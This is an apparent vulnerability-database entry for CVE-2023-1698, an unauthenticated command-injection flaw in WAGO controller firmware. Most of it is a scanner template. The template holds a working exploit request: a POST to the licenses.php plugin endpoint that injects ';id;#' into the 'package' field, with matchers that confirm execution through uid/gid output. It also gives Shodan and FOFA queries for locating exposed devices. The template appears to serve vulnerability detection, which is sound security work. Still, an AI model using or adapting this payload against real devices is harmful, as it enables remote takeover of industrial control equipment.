CVE-2023-1698: WAGO - Remote Command Execution

Date: 2025-08-01 | Affected software: WAGO | PoC: publicly available

Vulnerability description

In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.

PoC code [publicly available]

id: CVE-2023-1698

info:
  name: WAGO - Remote Command Execution
  author: xianke
  severity: critical
  description: |
    In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1698
    - https://cert.vde.com/en/advisories/VDE-2023-007/
    - https://github.com/codeb0ss/CVE-2023-1698-PoC
    - https://github.com/deIndra/CVE-2023-1698
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1698
    cwe-id: CWE-78
    epss-score: 0.9376
    epss-percentile: 0.99853
    cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wago
    product: compact_controller_100_firmware
    shodan-query:
      - html:"/wbm/" html:"wago"
      - http.html:"/wbm/" html:"wago"
    fofa-query: body="/wbm/" html:"wago"
  tags: cve2023,cve,wago,rce

http:
  - raw:
      - |
        POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"package":";id;#"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"license":'
          - '"name":'
          - 'uid='
          - 'gid='
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210091eae1a57050c3fa0c094fae0093c743e91491bd298f59ec6f9576ffcfec6072022100d457ebfab88e9668476f57e77a2fcd3929f7315b7eb79a54bdd57063120602b5:922c64590222798bb761d5b6d8e72950
